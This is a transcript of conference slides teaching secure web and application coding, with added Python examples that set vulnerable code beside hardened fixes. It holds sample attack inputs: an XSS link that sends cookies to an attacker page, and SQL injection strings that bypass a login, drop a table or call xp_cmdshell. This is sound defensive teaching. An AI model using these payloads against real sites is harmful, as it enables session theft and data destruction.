Post on 22-Dec-2015

TRANSCRIPT

Microsoft Australia Security Summit

Managing Risk: Application Development Principles and Best Practices

Dave Glover, Microsoft Pty Ltd
http://blogs.msdn.com/dglover


The Gartner Group states: "Today over 70% of attacks against a company's Web site or Web application come at the 'Application Layer', not the Network or System layer."


Agenda

Buffer Overruns

Arithmetic Errors

Cross-site Scripting

SQL Injection

Cryptography Weaknesses

Hidden Field Tampering

Canonicalization Issues

Web Services Security

The Others…

… And Finally



Buffer Overruns

Occur when data exceeds the expected size and overwrites other values

Exist primarily in unmanaged C/C++ code

Four types:
  Stack-based overruns
  Heap overruns
  V-table and function pointer overwrites
  Exception handler overwrites

Can be exploited by worms and can result in:
  Access violation (denial of service)
  Instability
  Code injection


How Stack-Based Buffer Overruns Work

    #include <string.h>

    void flawed(char *str) {
        char buffer[10];          /* 10 bytes on the stack, no length check */
        strcpy(buffer, str);      /* copies until the NUL: 24 bytes into 10 */
    }

    int main(void) {
        flawed("This string is too long");   /* overwrites the saved frame data past buffer */
        return 0;
    }


Defending Against Buffer Overruns

Deprecated and should be avoided: strcpy, strncpy (does not guarantee NUL termination), CopyMemory, MultiByteToWideChar, …

Use strsafe.h for safer buffer handling

Use the /GS compile option in Visual C++ .NET (stack cookies detect a stack overrun at function return; they do not make the copy safe)

Check all array indexes

Use recognized file-path processing methods, such as _splitpath (C runtime)

Use managed code, but pay attention to P/Invoke and COM Interop, where unmanaged buffers come back into play



Arithmetic Errors

Occur when the limitations of a variable are exceeded

Lead to serious runtime issues

Are often overlooked and underestimated

Include:
  Overflow: value too large for the data type
  Underflow: value too small for the data type


Demo: Arithmetic Overflow (CalEngine, Purchase.aspx, GoodPurchase.aspx)


Defending Against Arithmetic Errors

Understand the limitations

Unit test boundary conditions

Consider the limitations of data types

Consider writing safe, reusable functions

Consider using a safe template class (if coding in C++)

Use languages that support overflow checking: VB.NET (integer overflow checks are on by default) and C# (the checked keyword or the /checked+ compiler option)
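The Purchase.aspx demo above turns on one fact: an unchecked 32-bit multiply wraps, so a large quantity can produce a negative "total" that passes a credit-limit check. The following is an added example (not code from the slides) that reproduces that failure and the checked version next to it. Python integers never overflow, so the Int32 wrap of unchecked C#/C++ arithmetic is emulated explicitly; the prices, quantity and credit limit are constructed values, and the function names are hypothetical.

```python
"""Arithmetic overflow in an order-total calculation: 32-bit wrap-around vs. a checked version."""

INT32_MAX = 2**31 - 1


def wrap_int32(value: int) -> int:
    """Two's-complement wrap of an arbitrary integer into the Int32 range,
    i.e. what an unchecked 32-bit multiply silently does."""
    value &= 0xFFFFFFFF
    return value - 2**32 if value > INT32_MAX else value


def order_total_unchecked(unit_price_cents: int, quantity: int) -> int:
    """Vulnerable: the product wraps, so a large quantity yields a negative or tiny total."""
    return wrap_int32(unit_price_cents * quantity)


def approve_order(total_cents: int, credit_limit_cents: int) -> bool:
    """The business rule the overflow subverts: it only checks the upper bound,
    so a wrapped (negative) total sails through."""
    return total_cents <= credit_limit_cents


def order_total_checked(unit_price_cents: int, quantity: int) -> int:
    """Hardened: validate each input's range, then refuse any product outside
    Int32 (the equivalent of a C# checked { } block raising OverflowException)."""
    if not 0 < unit_price_cents <= INT32_MAX:
        raise ValueError("unit price out of range")
    if not 0 < quantity <= INT32_MAX:
        raise ValueError("quantity out of range")
    total = unit_price_cents * quantity
    if total > INT32_MAX:
        raise OverflowError("order total exceeds Int32")
    return total


def checked_rejects(unit_price_cents: int, quantity: int) -> bool:
    """True when the checked calculation refuses the order."""
    try:
        order_total_checked(unit_price_cents, quantity)
    except (OverflowError, ValueError):
        return True
    return False


if __name__ == "__main__":
    # Constructed figures: $10.00 per unit, an absurd quantity, a $500 credit limit.
    price, qty, limit = 1000, 2_147_484, 50_000
    print("unchecked total:", order_total_unchecked(price, qty))            # -2147483296
    print("approved?", approve_order(order_total_unchecked(price, qty), limit))  # True
    print("checked rejects?", checked_rejects(price, qty))                  # True
```

The unit test for this code is exactly the "unit test boundary conditions" bullet: one case at INT32_MAX, one just past it, and one with a negative input.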



Cross-Site Scripting

Malicious script is sent to a Web application as input, then echoed back to a user's browser, where it is executed

Targets your users; your application is the vehicle

Reflected attacks arrive via carefully crafted hyperlinks

Allows hackers to:
  Execute malicious script in a client's Web browser
  Insert <script>, <object>, <applet>, <form>, and <embed> tags
  Steal Web session information and cookies (including authentication cookies)
  Access the client computer's resources


How Cross-Site Scripting Works

    <a href="http://…/Search.aspx?Search=<script language='javascript'>document.location.replace('http://localhost/EvilPage.aspx?Cookie=' + document.cookie);</script>">…</a>

The URL points to the site that the hacker wants to attack; the query string contains embedded JavaScript that redirects to the hacker's page and transmits any cookies issued by Search.aspx in a query string


What Is a One-Click Attack (cross-site request forgery)

Site offers a persistent sign-in option (cookies)

Victim user navigates to (or opens) an HTML page, perhaps a "once in a lifetime offer"

One or more actions are carried out with the trust (the cookies) of the victim user, without that user suspecting anything


Demo: Cross-Site Script Attacks (Search.aspx, Review.aspx, AntiXSS Library, Secure Controls, GoodSearch.aspx, Validation Controls, Secure Frames, One-Click Attack)


Defending Against Cross-Site Scripting Attacks

Do not:
  Trust user input
  Echo client-supplied data without encoding
  Store secret information in cookies

Do:
  Take advantage of ASP.NET's validateRequest
  Take advantage of ASP.NET's ViewStateUserKey
  Consider AntiXSS for data encoding
  Use the HttpOnly cookie option
  Use the <frame> security attribute
  Implement secure custom controls


Defending Against XSS

Input validation: first line of defense

Output encoding

Platform features:
  Server.HtmlEncode(): OK, works by exclusion (black-listing: it escapes a fixed set of characters)
  Anti-XSS library: better, works by inclusion (white-listing: everything outside a known-safe set is encoded)

Context: non-persistent (reflected) XSS. The product search feature of WIDGETCO displays the 'searchstring' input without sanitizing or encoding.

Bad code:

    someLabel.Text = "Results for " + searchstring + ":";

Mitigation using Anti-XSS (Microsoft.Security.Application.AntiXss):

    someLabel.Text = "Results for " + AntiXss.HtmlEncode(searchstring) + ":";
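The WIDGETCO search example, worked through end to end as an added example (not code from the slides): the raw echo, the HTML-body encoding that fixes it, and the case the slide does not show, where the same value goes into a URL inside an attribute and needs a different encoder. The payload is the cookie-stealing script from the crafted hyperlink earlier in the deck; render_results_bad, render_results_good and render_search_link are hypothetical stand-ins for Search.aspx.

```python
"""Reflected XSS in a search page: raw echo vs. context-appropriate encoding."""
import html
from urllib.parse import quote

# Constructed attacker input, exactly as it would arrive in ?Search=...
PAYLOAD = ("<script>document.location.replace("
           "'http://localhost/EvilPage.aspx?Cookie=' + document.cookie);</script>")


def render_results_bad(searchstring: str) -> str:
    """Vulnerable: client-supplied text is concatenated straight into the HTML body,
    so a <script> in the query string becomes a <script> in the page."""
    return "<p>Results for " + searchstring + ":</p>"


def render_results_good(searchstring: str) -> str:
    """Fixed: encode for the HTML-body context before echoing. html.escape plays
    the role of Server.HtmlEncode / AntiXss.HtmlEncode here: < > & " ' become entities."""
    return "<p>Results for " + html.escape(searchstring, quote=True) + ":</p>"


def render_search_link(searchstring: str) -> str:
    """A different output context needs a different encoder: the value goes into
    a URL query, and that URL into an attribute, so URL-encode the value first,
    then attribute-encode the whole href."""
    href = "/Search.aspx?Search=" + quote(searchstring, safe="")
    return '<a href="' + html.escape(href, quote=True) + '">search again</a>'


def has_live_script(rendered: str) -> bool:
    """Crude oracle for the tests: an unencoded '<script' is one the browser would run."""
    return "<script" in rendered.lower()


if __name__ == "__main__":
    print(render_results_bad(PAYLOAD))    # script survives intact
    print(render_results_good(PAYLOAD))   # &lt;script&gt;... inert text
    print(render_search_link(PAYLOAD))    # %3Cscript%3E... inert in the href
```

Encoding is applied at the output point, not at input, because the same string is safe in one context and dangerous in another; validateRequest-style input filtering is a useful first line but never the last.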


Defending Against One-Click Attack

The browser's cross-frame security limits this to a "write-only" attack: the attacker's page can make the victim's browser send the request, but cannot read the response

Concept for defense: require a data element in the request which the attacker can't supply

Check the Referer header (some browsers and proxies strip it, so treat it as a secondary check)

In .NET 1.1 use ViewStateUserKey, set before view state is loaded (Page.OnInit):

    protected override void OnInit(EventArgs e)
    {
        // ...
        ViewStateUserKey = User.Identity.Name;
        // ...
        base.OnInit(e);
    }
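What ViewStateUserKey buys you is a value in the form that is bound to the signed-in user and covered by the view-state MAC, so a page on another site cannot reproduce it. The following is an added example (not code from the slides) of the same defence written out by hand: a per-user, per-session HMAC token checked on every state-changing request, plus the Referer check as a secondary control. The server secret, session ids and site origin are constructed values; the function names are hypothetical.

```python
"""One-click (CSRF) defence: the request must carry a value only the genuine page could contain."""
import hashlib
import hmac
from typing import Optional

SERVER_SECRET = b"constructed-demo-secret-keep-server-side"  # assumption: never sent to clients
SITE_ORIGIN = "https://shop.example"                          # assumption: this site's origin


def issue_token(user_name: str, session_id: str, secret: bytes = SERVER_SECRET) -> str:
    """Embedded in every form the server renders for this user/session.
    An attacker's page knows the user name but neither the secret nor the session id."""
    msg = f"{user_name}\x00{session_id}".encode("utf-8")
    return hmac.new(secret, msg, hashlib.sha256).hexdigest()


def request_is_genuine(user_name: str, session_id: str, submitted_token: Optional[str],
                       referer: Optional[str], secret: bytes = SERVER_SECRET) -> bool:
    """Server-side check on every state-changing POST."""
    # Primary control: the token must match, compared in constant time.
    expected = issue_token(user_name, session_id, secret)
    if not submitted_token or not hmac.compare_digest(expected, submitted_token):
        return False
    # Secondary control (the slides' 'check Referrer'): a Referer that is present
    # but foreign is a forgery; an absent Referer is tolerated because some
    # browsers and proxies strip it, so it can never be the only control.
    if referer is not None and not referer.startswith(SITE_ORIGIN + "/"):
        return False
    return True


if __name__ == "__main__":
    token = issue_token("jeff", "sess-1")
    print(request_is_genuine("jeff", "sess-1", token, SITE_ORIGIN + "/checkout.aspx"))  # True
    print(request_is_genuine("jeff", "sess-1", None, "http://evil.example/offer.html"))  # False
```

Binding the token to the session id as well as the user name means a token captured from one session is useless in another, which is a stronger binding than the bare User.Identity.Name used on the slide.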



SQL Injection

Adds SQL statements to user input to:
  Probe databases, execute multiple SQL statements
  Bypass authorization
  Call built-in stored procedures

Exploits applications that don't validate input

Input comes from <form> fields, query strings, cookies


How SQL Injection Works

Model query:

    SELECT COUNT(*) FROM Users WHERE UserName='Jeff' AND Password='imbatman'

Malicious query (user name entered as ' or 1=1 --, password left empty):

    SELECT COUNT(*) FROM Users WHERE UserName='' or 1=1 --' AND Password=''

"or 1=1" matches every record in the table

"--" comments out the remainder of the query, including the password check


Examples of SQL Injection

If the ID variable is read directly from a Web form or Windows form textbox, the user could enter any of the following:

ALFKI1001

ALFKI1001' or 1=1 --

ALFKI1001'; DROP TABLE OrderDetail --

ALFKI1001'; exec xp_cmdshell('fdisk.exe') --

Dynamic SQL built from raw input, the pattern that makes all of the above work:

    sqlString = String.Format("select count(*) from customers where username='{0}' and password='{1}'", userName, password);


Demo: SQL Injection Attack (Login Attack, Search Page Attack, SQL Cmd Shell Attack)


Defending Against SQL Injection

Code against SQL injection attacks:
  Sanitize all input
  Don't use dynamic SQL commands
  Use secured stored procedures or parameterized commands (a stored procedure that concatenates its arguments into EXEC is still injectable)

Run with least privilege:
  Never execute as "sa"
  Restrict access to built-in stored procedures such as xp_cmdshell

Store connection strings securely:
  Integrated security is better than embedded credentials
  Encrypt the Web.config connectionStrings section (DPAPI or the Configuration Application Block)

Do not echo database errors (fail intelligently)

Apply administrative protections to SQL Server

http://msdn.microsoft.com/library/en-us/dnnetsec/html/THCMCh14.asp
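The login query from the "How SQL Injection Works" slide, run for real as an added example (not code from the slides): the concatenated form that the String.Format pattern produces, and the parameterized command the defence list recommends, both executed against an in-memory SQLite database. The Users table and its rows are constructed; passwords are stored in clear only so the injection stays visible (real code compares salted hashes).

```python
"""SQL injection: dynamic SQL vs. a parameterized command, against an in-memory SQLite database."""
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed sample data standing in for the slides' Users table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE Users (UserName TEXT NOT NULL, Password TEXT NOT NULL)")
    conn.executemany("INSERT INTO Users VALUES (?, ?)",
                     [("Jeff", "imbatman"), ("Alice", "correct-horse")])
    return conn


def injected_query_text(user_name: str, password: str) -> str:
    """The SQL text the vulnerable path actually runs (useful to log in tests and IR)."""
    return ("SELECT COUNT(*) FROM Users WHERE UserName='" + user_name +
            "' AND Password='" + password + "'")


def login_dynamic_sql(conn: sqlite3.Connection, user_name: str, password: str) -> bool:
    """Vulnerable: user input becomes part of the SQL text, so
    ' or 1=1 --  turns the WHERE clause into 'match everything'."""
    return conn.execute(injected_query_text(user_name, password)).fetchone()[0] > 0


def login_parameterized(conn: sqlite3.Connection, user_name: str, password: str) -> bool:
    """Hardened: placeholders; the driver sends the values as data, never as SQL,
    so a quote or comment marker in the input is just characters to compare."""
    sql = "SELECT COUNT(*) FROM Users WHERE UserName=? AND Password=?"
    return conn.execute(sql, (user_name, password)).fetchone()[0] > 0


if __name__ == "__main__":
    db = make_db()
    attack = "' or 1=1 --"
    print(injected_query_text(attack, ""))
    print("dynamic SQL lets the attacker in:", login_dynamic_sql(db, attack, ""))   # True
    print("parameterized query does not:", login_parameterized(db, attack, ""))     # False
```

The stacked-statement payloads from the examples slide ('; DROP TABLE ... --) happen to fail here only because sqlite3's execute() refuses more than one statement per call; that is a driver accident, not a defence, and SQL Server's ADO.NET provider will happily run them. The parameterized path is the one that actually closes the hole, and least privilege limits what a successful injection can reach.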



Cryptography Weaknesses

Inappropriate use of algorithms:
  Creating your own
  Using weak ones
  Incorrect application

Failure to keep keys secure:
  Insecure storage
  Extensive duration of use

The human factor:
  Accidental release of private keys

Key, plaintext, ciphertext, algorithm: the attacker's view is "I need three of the above to decrypt your data!"


Defending Against Cryptography Weaknesses

Rotate (recycle) keys periodically

Use ACLs to restrict access to keys

Store keys on an external device (smart card or hardware security module)

Use larger keys to provide increased security

Use DPAPI to simplify key management, if possible

Do not implement your own cryptographic routines



Hidden-Field Tampering

Exploits applications that persist data between requests by round-tripping it in hidden <input> fields

The technique:
  Look for <input type="hidden" … > tags
  Submit bogus requests with modified value attributes to spoof a Web server


How Hidden-Field Tampering Works

Page contains this:

    <input type="hidden" id="price" value="10000.00">

Postback data should contain this: price=10000.00

Instead it contains this: price=1.00
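The price field above illustrates two defences, shown here as an added example (not code from the slides): the first is not to round-trip the value at all and look the price up server-side by product id; the second, for state that genuinely must travel through the client, is to bind a MAC to the field so a modified value is detected, which is what ASP.NET's view-state MAC does for ViewState. The catalog, secret and form data are constructed, and the function names are hypothetical.

```python
"""Hidden-field tampering: a price round-tripped through the client vs. two server-side defences."""
import hashlib
import hmac

CATALOG = {"WIDGET-42": "10000.00"}                        # constructed server-side price list
FIELD_SECRET = b"constructed-demo-secret-for-field-macs"   # assumption: server-only


def charge_bad(form: dict) -> str:
    """Vulnerable: trusts whatever price the browser sent back in the hidden field."""
    return form["price"]


def charge_good(form: dict) -> str:
    """Defence 1: never round-trip a value the server already knows; look it up
    by product id and ignore any client-supplied price. Unknown id raises KeyError."""
    return CATALOG[form["product_id"]]


def protect_field(name: str, value: str, secret: bytes = FIELD_SECRET) -> str:
    """Defence 2, for state that must round-trip: append a MAC over field name and
    value, so the MAC for one field cannot be replayed on another."""
    mac = hmac.new(secret, f"{name}={value}".encode("utf-8"), hashlib.sha256).hexdigest()
    return f"{value}|{mac}"


def read_protected_field(name: str, packed: str, secret: bytes = FIELD_SECRET) -> str:
    """Verify the MAC before using the value; raise ValueError on any tampering."""
    value, sep, mac = packed.rpartition("|")
    if not sep:
        raise ValueError("field is not MAC-protected")
    expected = hmac.new(secret, f"{name}={value}".encode("utf-8"), hashlib.sha256).hexdigest()
    if not hmac.compare_digest(expected, mac):
        raise ValueError(f"hidden field {name!r} was tampered with")
    return value


def field_is_tampered(name: str, packed: str) -> bool:
    """True when the postback value fails verification."""
    try:
        read_protected_field(name, packed)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    postback = {"product_id": "WIDGET-42", "price": "1.00"}   # constructed tampered postback
    print("bad charges:", charge_bad(postback))                 # 1.00
    print("good charges:", charge_good(postback))               # 10000.00
    packed = protect_field("price", "10000.00")
    forged = "1.00|" + packed.split("|")[1]                    # old MAC, new value
    print("forged field detected:", field_is_tampered("price", forged))  # True
```

A MAC only proves the server produced the value; it does not stop a client replaying an old but validly signed value, so anything price-like is still better looked up server-side.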



Canonicalization Issues

There is usually more than one way to name something

Alternate representations exist for:
  File names
  URLs
  Devices (such as printers)

Hackers may exploit code that makes decisions based on file names or URLs


Canonicalization Issues, Example 1: File Names

All four of these name the same file on an NTFS volume, so a check that compares the string the client sent against "MyLongFile.txt" passes only the first:

1 MyLongFile.txt

2 MyLongFile.txt. (the trailing dot is stripped by Win32)

3 MyLong~1.txt (the 8.3 short name)

4 MyLongFile.txt::$DATA (the file's default NTFS data stream, named explicitly)


Defending Against Canonicalization Issues

Use file-system security to restrict access to private data

Never make a decision based on a name

Disable the IIS Parent Paths setting

Encrypt Web.Config Sections
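"Never make a decision based on a name" in practice means two things: decode the client's value exactly once and validate the decoded form against an allow-list, then resolve the path and check that the canonical result still lies under the directory you intended. The following is an added example (not code from the slides) that does both and rejects every alternate spelling from the file-name slide as well as the encoded traversal forms behind the PathTraversal/ViewImage demo. The base directory and requested names are constructed and the function names hypothetical; the allow-list rejects the NTFS-specific spellings on any OS, so the example runs unchanged on Linux.

```python
"""Canonicalization: decide on the resolved path plus an allow-list, not on the name the client sent."""
import os
import re
from urllib.parse import unquote

# Allow-list for a bare file name: letters, digits, _ and -, at most one extension.
# This rules out path separators, '..', trailing dots, ':' (NTFS streams such as
# ::$DATA), '~' (8.3 short names) and '%' (double-encoded traversal).
SAFE_NAME = re.compile(r"[A-Za-z0-9_-]+(\.[A-Za-z0-9]+)?")


def resolve_under(base_dir: str, requested: str) -> str:
    """Return the canonical path of `requested` inside `base_dir`, or raise ValueError."""
    name = unquote(requested)            # decode exactly once, then validate the decoded form
    if not SAFE_NAME.fullmatch(name):
        raise ValueError(f"rejected name: {requested!r}")
    base = os.path.realpath(base_dir)
    full = os.path.realpath(os.path.join(base, name))
    # Defence in depth: even a name that passed the allow-list must resolve
    # (symlinks included) to somewhere under base.
    if os.path.commonpath([base, full]) != base:
        raise ValueError(f"escapes base directory: {requested!r}")
    return full


def is_allowed(base_dir: str, requested: str) -> bool:
    """True when the request would be served, False when it is refused."""
    try:
        resolve_under(base_dir, requested)
    except ValueError:
        return False
    return True


if __name__ == "__main__":
    base = "/srv/images"   # constructed
    for name in ("MyLongFile.txt", "MyLongFile.txt.", "MyLong~1.txt",
                 "MyLongFile.txt::$DATA", "../../etc/passwd", "..%2f..%2fetc%2fpasswd"):
        print(f"{name!r:32} allowed={is_allowed(base, name)}")
```

The file-system ACL the slide lists first remains the backstop: if the application's identity cannot read outside the images directory, a miss in this check still fails closed.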


Encrypting Web.config sections

    aspnet_regiis -pc "SampleKeys" -exp                  (create an exportable RSA key container)
    aspnet_regiis -pa "SampleKeys" "domain\acct"         (grant the application's account access to it)
    aspnet_regiis -pef connectionStrings .               (encrypt the section in the Web.config of the current directory)
    aspnet_regiis -pdf connectionStrings .               (decrypt it again)

Web.config:

    <configProtectedData defaultProvider="SampleProvider">
      <providers>
        <add name="SampleProvider"
             type="System.Configuration.RsaProtectedConfigurationProvider, System.Configuration, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a, processorArchitecture=MSIL"
             keyContainerName="SampleKeys"
             useMachineContainer="true" />
      </providers>
    </configProtectedData>


Demo: Traversal Attacks (PathTraversal.htm, ViewImage.aspx, GoodProducts.aspx, Web.config Encryption)


Next Steps

Stay informed about security:
  Microsoft Developers Network Security Center: http://msdn.microsoft.com/security/
  Microsoft Security Guidance: http://www.microsoft.com/security/guidance/

Get additional security training; find online and in-person training seminars:
  http://www.microsoft.com/seminar/events/security/

Read the book: Writing Secure Code, Michael Howard and David LeBlanc, ISBN 0-7356-1722-8


Defending Against the Others

Improving Web Application Security: Threats and Countermeasures
http://msdn.microsoft.com/library/default.asp?url=/library/en-us/dnnetsec/html/ThreatCounter.asp


Security seminar follow up

Security e-forum site: www.microsoft.com.au/eforum

View on-demand web casts of all presentations from this event (tell your work colleagues!)

Online live chats: have a live chat with the Microsoft security experts you'll see today. Check the e-forum site for the live chat schedule.

Plus lots more…

Evaluation forms: we value your feedback! Need help with your business' security? Q7: register your interest on the eval form if you want to meet with Microsoft / an MS Security Solutions Partner to discuss solutions to address your security challenges.

Fill in your form to go into the draw to win an HP Media Centre PC or Xbox 360
